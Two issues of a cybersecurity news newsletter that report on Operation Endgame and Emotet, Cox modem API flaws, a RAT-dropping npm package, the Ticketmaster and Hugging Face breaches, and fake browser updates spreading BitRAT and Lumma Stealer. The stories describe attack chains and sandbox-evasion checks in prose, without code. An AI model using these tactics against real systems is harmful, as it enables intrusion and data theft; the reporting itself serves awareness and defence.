.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s cybercrime-a-phobic ๐Ÿ™ƒ๐Ÿ™ƒ๐Ÿ™ƒ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ‘จโ€๐Ÿ’ป Emotetโ€™s got authorities running scared #shook ๐Ÿ˜ฐ

  • ๐Ÿ›‘ Flaws in Cox modems could impact millions ๐ŸŒ

  • ๐Ÿ˜ฒ Gulp! RAT-Droppings found in npm package ๐Ÿ“ฆย 

You better Emotet yourself before you wreck yourself ๐Ÿ”ซ๐Ÿ”ช๐Ÿฉธ๐Ÿ˜ˆ๐Ÿคต๐Ÿ’ตโ›“๏ธ๐Ÿ’€

Kevin James Kingofqueens GIF by TV Land

Gif by tvland on Giphy

๐Ÿšจ Operation Endgame Seeks Info on Emotet Mastermind "Odd" ๐Ÿง 

Law enforcement authorities involved in Operation Endgame are seeking information about an individual known as "Odd," who is allegedly the mastermind behind the infamous Emotet malware.

Who is "Odd"? ๐ŸŽฐ

Aliases: Aron, C700, Cbd748, Ivanov Odd, Mors, Morse, Veron

Authorities believe Odd may not be working alone and could be collaborating with others on different malware projects.

Background on Emotet ๐ŸŒ†

Aliases in the Cybersecurity Community: Gold Crestwood, Mealybug, Mummy Spider, TA542

Evolution: Originally a banking trojan, Emotet evolved into a multipurpose tool capable of delivering other malware such as TrickBot, IcedID, and QakBot.

Recent Activity: An updated version of Emotet was found in March 2023 using Microsoft OneNote email attachments to bypass security. No new activity has been seen since April 2023.

Operation Endgame's Efforts ๐Ÿ”š

Recent Actions: The operation has resulted in four arrests and the takedown of over 100 servers linked to malware operations like IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot.

Target: The aim is to disrupt the Initial Access Broker (IAB) ecosystem that facilitates ransomware attacks.

Germany's Federal Criminal Police Office (BKA)

Revelation: Identified eight cybercriminals involved in SmokeLoader and Trickbot operations, adding them to the E.U. Most Wanted List.

Impact on Cybercrime ๐Ÿ‘จโ€๐Ÿ’ป

Affected Groups: The crackdown has impacted Russian cybercrime organisations like BlackBasta, Revil, and Conti, which have used these malware services to attack Western companies, including medical institutions.

Community Reaction ๐Ÿคฏ

Underground Forums: Cybercriminals on forums like XSS.IS are on high alert. The forum moderator "bratva" advised members to check their virtual private servers (VPSes) for disruptions between May 27 and 29, 2024.

Speculation: Users are speculating about the possibility of an insider ("rat") working with law enforcement, especially in light of leaked Conti ransomware logs.

What to Watch For

Potential Threats: Be aware of compromised accounts and malicious emails that use stolen credentials from RATs and info stealers to gain initial access to networks.

Takeaway

Stay Vigilant: As authorities continue their efforts to dismantle cybercriminal networks, itโ€™s crucial to remain vigilant against potential cyber threats. ๐ŸŒ๐Ÿ”’

ย Major Cox up ๐Ÿ™ˆ๐Ÿ™ˆ๐Ÿ™ˆ

๐Ÿšจ Cox Modem Vulnerabilities Patched to Prevent Unauthorised Access ๐Ÿ› ๏ธ

Recently patched authorization bypass issues in Cox modems could have been exploited to gain unauthorised access and execute malicious commands on these devices.

Key Points ๐Ÿ”‘

Research Findings: Security researcher Sam Curry discovered vulnerabilities that allowed external attackers to execute commands, modify modem settings, and access personal information of business customers.

Potential Impact: Attackers could gain permissions equivalent to an ISP support team, affecting millions of modems.

Disclosure and Response: The vulnerabilities were responsibly disclosed to Cox on March 4, 2024, and were addressed within 24 hours. There is no evidence of exploitation in the wild.

Behind the Scenes ๐ŸŽฌ

ISP Access: ISPs like Cox have extensive access to customer devices for remote management, including changing settings and viewing connected devices.

Internal Infrastructure: ISPs use internal infrastructures, such as Xfinity, that bridge consumer devices to exposed APIs. Vulnerabilities in these systems could compromise millions of devices.

Research Details ๐Ÿ”ฌ

API Endpoints: Curry's analysis found about 700 exposed API endpoints. Some could be exploited to gain administrative access and execute unauthorized commands by replaying HTTP requests.

Example Exploit: The "profilesearch" endpoint could search for a customerโ€™s business account details using their name, retrieve hardware MAC addresses, and modify accounts.

Potential Attack Scenario โš”๏ธ

Hypothetical Attack: An attacker could:

  • Look up a Cox customer and get complete account details.

  • Query the hardware MAC address to retrieve Wi-Fi passwords and connected devices.

  • Execute arbitrary commands to take over accounts.

Underlying Issues ๐Ÿ‘‡

Complex Management: Managing a wide range of customer devices via a REST API is complex. This complexity likely contributed to the security flaws.

Authorization Mechanism: The issues arose from relying on a single internal protocol for access, highlighting the need for better authorization mechanisms.

Curry's Perspective ๐Ÿ›

Insight: Curry was surprised by the level of access ISPs have to customer devices. He noted that better authorization mechanisms could prevent such vulnerabilities.

Past Research

Curry's team previously disclosed vulnerabilities in vehicles and points.com that could unlock, start, and track cars, and access and manage customer rewards points.

Conclusion ๐Ÿ

The patching of these vulnerabilities highlights the importance of secure management practices for customer devices by ISPs. It underscores the need for robust authorization mechanisms to prevent unauthorised access and potential misuse.

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Stay ahead of the curve with Presspool.ai! ๐Ÿš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐Ÿค“๐Ÿ’ก Thatโ€™s us, alright! ๐Ÿคต How about you? Visionary AI executive, much? ๐Ÿ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿ’ป๐ŸŒ

Rest assured, the process is very straightforward.

You simply:

๐Ÿ†• Sign Up & Create Campaign

๐Ÿ“Š Define your audience, budget, and message to captivate your audience.

๐Ÿš€ Launch your campaign, as Presspoolโ€™s AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ŸŽฏ

๐Ÿ•ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐Ÿ“ˆ Elevate your marketing game and stay informed with Presspool.ai! ๐ŸŒŸ Simples! ๐Ÿฆฆ

Presspool.aiย ๐Ÿ“ฐ๐ŸŠ๐Ÿค– may just have what you need to succeed. And if the product isnโ€™t for you, the newsletter alone is a gamechanger. And we know newsletters ๐Ÿ˜‰

Smells like RAT-Droppings ๐Ÿ€๐Ÿ€๐Ÿ€

๐Ÿšจ New Suspicious Package on npm Drops Remote Access Trojan ๐ŸŽ

Cybersecurity researchers have discovered a new malicious package uploaded to the npm package registry, designed to deploy a remote access trojan (RAT) on compromised systems. Here's a breakdown of what was found:

Package Details ๐Ÿ“ฆ

Name: glup-debugger-log

Target: Users of the gulp toolkit, disguised as a "logger for gulp and gulp plugins."

Downloads: 175 times to date.

Malware Analysis ๐Ÿ‘พ

Discovery: Software supply chain security firm Phylum identified the package.

Obfuscated Files: The package contains two obfuscated files working together to deploy the RAT.

Initial Dropper: Sets the stage for the malware campaign by compromising the target machine if it meets specific criteria, then downloads additional malware components.

Remote Access Mechanism: Provides persistent control over the compromised machine.

Technical Breakdown โš™๏ธ

Manifest File: The library's package.json file contains a test script running a JavaScript file ("index.js") which, in turn, calls an obfuscated JavaScript file ("play.js").

Checks and Persistence: The "play.js" file functions as a dropper that:

Performs checks for network interfaces, specific Windows OS types (Windows NT), and the number of files in the Desktop folder (seven or more).

Ensures the target is an active developer machine, avoiding deployment on VMs or new installations.

If criteria are met, launches another JavaScript ("play-safe.js") to set up persistence.

Persistence and Command Execution โšก

HTTP Server Setup: "play-safe.js" establishes an HTTP server listening on port 3004 for incoming commands.

Command Execution: Executes commands and sends the output back to the client as plaintext.

Phylum's Insights ๐Ÿ’ก

Nature of the RAT: Described as both crude and sophisticated due to its minimal functionality, self-contained nature, and heavy reliance on obfuscation.

Evolving Threats: Highlights the growing complexity and cleverness of malware in open-source ecosystems, with attackers developing compact, efficient, and stealthy malware designed to evade detection while maintaining powerful capabilities.

This discovery underscores the importance of vigilant monitoring and security practices in the software supply chain to protect against evolving threats.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

ShinyHunters demands a $500,000 for Ticketmaster hack

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s blasting off like #Starlink ๐Ÿš€๐Ÿš€๐Ÿš€

Todayโ€™s hottest cybersecurity news stories:

  • ๐ŸŽซ Ticketmaster hacked again! 560m affected. $500k demanded ๐Ÿ’ฐ

  • ๐Ÿค— Hugging Face detects unauthorised access to Spaces platform ๐Ÿš‰

  • โš ๏ธ Beware of fake browser update delivering BitRAT, Lumma Stealer ๐Ÿ€

Ticketmaster? Hackers nick it faster ๐Ÿ™ƒ๐Ÿ™ƒ๐Ÿ™ƒ

๐Ÿšจ Ticketmaster Hack Exposes 560 Million Customers' Data! ๐Ÿ—ƒ๏ธ

Live Nation, Ticketmasterโ€™s owner, confirmed "unauthorised activity" on its database after hackers claimed to have stolen personal details of 560 million customers. The hacking group ShinyHunters demands a $500,000 ransom to prevent selling the data. ๐Ÿ’ฐ

What Was Stolen? ๐Ÿค

The stolen data includes:

  • Names

  • Addresses

  • Phone numbers

  • Partial credit card details ๐Ÿ’ณ

  • Investigation Underway

Live Nation revealed in a filing to the SEC that a criminal threat actor offered the data for sale on the dark web on May 27. The exact number of affected customers remains unconfirmed. ๐Ÿ”

Global Impact ๐ŸŒŽ

The Australian government and the FBI are involved in addressing the breach. Live Nation is working to mitigate risks and notify users about the unauthorised access. ๐ŸŒ

Linked Hacks ๐Ÿ”—

This breach may be connected to a larger hacking campaign. Santander recently confirmed a related data breach affecting 30 million customers. Data samples have been posted on BreachForums, a dark web hacking forum. ๐Ÿ’ป

ShinyHunters' Historyย ๐Ÿ“œ

ShinyHunters has a notorious past, including a breach of 70 million AT&T customers in 2021 and 200,000 Pizza Hut customers in Australia last year. Despite the FBIโ€™s crackdown in March 2023, the group remains active. ๐Ÿšจ

Past Security Issues ๐Ÿ“…

Ticketmaster has faced security issues before, including a $10 million fine in 2020 for hacking a competitor and a cyber attack in November affecting Taylor Swift's Era's tour ticket sales. ๐ŸŽŸ๏ธ

Top Tips ๐Ÿ›ก๏ธ

If youโ€™re worried you may be affected:

  • Be alert for suspicious emails, messages, and calls.

  • Avoid sharing information with scammers exploiting the breach.

  • ย Watch out for messages about password resets, compensation, or missed deliveries.

  • Monitor your financial accounts for suspicious activity.

  • Change your Ticketmaster password and any other sites using the same password. ๐Ÿ”

Stay safe and vigilant as this situation unfolds!

Learn how to scale your GRC program with automation and AI

Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.

  • Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring

  • Centralize risk and report on program impact to internal teams

  • Create your own Trust Center to proactively manage buyer needs

  • Leverage AI to answer security questionnaires faster

Join Vantaโ€™s webinar on June 11 to learn more about scaling your GRC program with automation and AI.

Register to save your spot.

Hugging egg on Face? ๐Ÿ‘€๐Ÿณ๐Ÿ™ˆ

๐Ÿšจ Hugging Face Security Breach Exposes AI Platform! ๐Ÿค–

AI company Hugging Face revealed unauthorised access to its Spaces platform. Suspicions arise that a subset of Spaces' secrets may have been accessed without authorization. ๐Ÿ”

What is Spaces? ๐ŸŒ

Spaces allows users to create, host, and share AI and machine learning applications. It also serves as a discovery service for AI apps made by others on the platform. ๐Ÿง 

Immediate Response ๐Ÿ—ฃ๏ธ

Hugging Face is revoking compromised HF tokens and notifying affected users via email. They recommend refreshing keys or tokens and switching to fine-grained access tokens, which are now the default. ๐Ÿ”

Impact and Investigation ๐Ÿ’ฅ

The number of impacted users remains undisclosed. The incident is under investigation, and law enforcement and data protection authorities have been alerted. ๐Ÿšจ

AI Sector Under Attack ๐ŸŽฏ

The rapid growth of AI has made AI-as-a-service providers like Hugging Face prime targets for attackers. In early April, cloud security firm Wiz highlighted potential vulnerabilities in Hugging Face, including cross-tenant access and AI/ML model poisoning risks. ๐Ÿ”’

Previous Security Concerns โš ๏ธ

Research by HiddenLayer identified flaws in Hugging Face's Safetensors conversion service, enabling hijacking of AI models for supply chain attacks. Malicious actors compromising Hugging Face could access private AI models, datasets, and critical applications, posing significant risks. โš ๏ธ

Stay Secure ๐Ÿ›ก๏ธ

Hugging Face users should update their tokens and stay vigilant against potential security threats. This breach underscores the importance of robust security measures in the growing AI sector. ๐ŸŒ

Donโ€™t get Bit by a RAT ๐Ÿ€๐Ÿ€๐Ÿ€

๐Ÿšจ Fake Browser Updates Delivering RATs and Info Stealers! ๐Ÿ€

Cybersecurity firm eSentire has identified a new wave of cyberattacks using fake browser updates to distribute remote access trojans (RATs) and information-stealing malware such as BitRAT and Lumma Stealer (aka LummaC2). ๐Ÿ”

The Attack Chain ๐Ÿ”—

  • Initial Contact: Victims are lured to a compromised website with JavaScript that redirects them to a fake browser update page ("chatgpt-app[.]cloud").

  • Download: The page prompts an automatic download of a ZIP archive file ("Update.zip") hosted on Discord.

  • Execution: Inside the ZIP file, a JavaScript file ("Update.js") executes PowerShell scripts to fetch additional payloads disguised as PNG images from a remote server.

PowerShell Payloads ๐Ÿš

The PowerShell scripts not only ensure persistence but also deploy a .NET-based loader used to deliver final-stage malware, including BitRAT and Lumma Stealer.

BitRAT: A versatile RAT capable of data theft, cryptocurrency mining, and remote control.

Lumma Stealer: A commercial information stealer that extracts data from web browsers, crypto wallets, and more, available for $250 to $1,000 per month since August 2022.

Why This Tactic Works โ™Ÿ๏ธ

The fake browser update lure is effective because it leverages the trust associated with well-known software updates, maximising the reach and impact of the attack. This method has been commonly used to distribute various types of malware, including the notorious SocGholish malware. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Broader Threat Landscape ๐Ÿž๏ธ

ClearFake Campaign: A new variant discovered by ReliaQuest involves tricking users into executing malicious PowerShell code by claiming a browser display issue and instructing them to install a root certificate.

Webhard Distribution: The AhnLab Security Intelligence Center (ASEC) reported campaigns using webhards to distribute malicious installers for adult games and cracked software, leading to malware like Orcus RAT and XMRig miner.

Impact and Prevalence ๐Ÿ’ฅ

Lumma Stealer has become one of the most prevalent info stealers, with a significant increase in logs for sale on cybercrime forums. The malwareโ€™s effectiveness lies in its ability to infiltrate systems and exfiltrate data undetected.

Additional Findings ๐Ÿง

CryptoChameleon: Silent Push highlighted CryptoChameleonโ€™s use of DNSPod[.]com nameservers for fast flux evasion techniques, allowing quick cycling of IPs linked to a single domain name, complicating traditional countermeasures.

Top Tips ๐Ÿ›ก๏ธ

  • Be Wary of Fake Updates: Always verify the source of any software update prompt.

  • Monitor PowerShell Activity: Keep an eye on unexpected PowerShell executions.

  • Use Security Software: Employ robust antivirus and anti-malware tools.

  • Stay Informed: Keep up with cybersecurity news and updates to be aware of emerging threats.

By staying vigilant and informed, individuals and organisations can better protect themselves against these sophisticated and evolving cyber threats. ๐ŸŒ

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter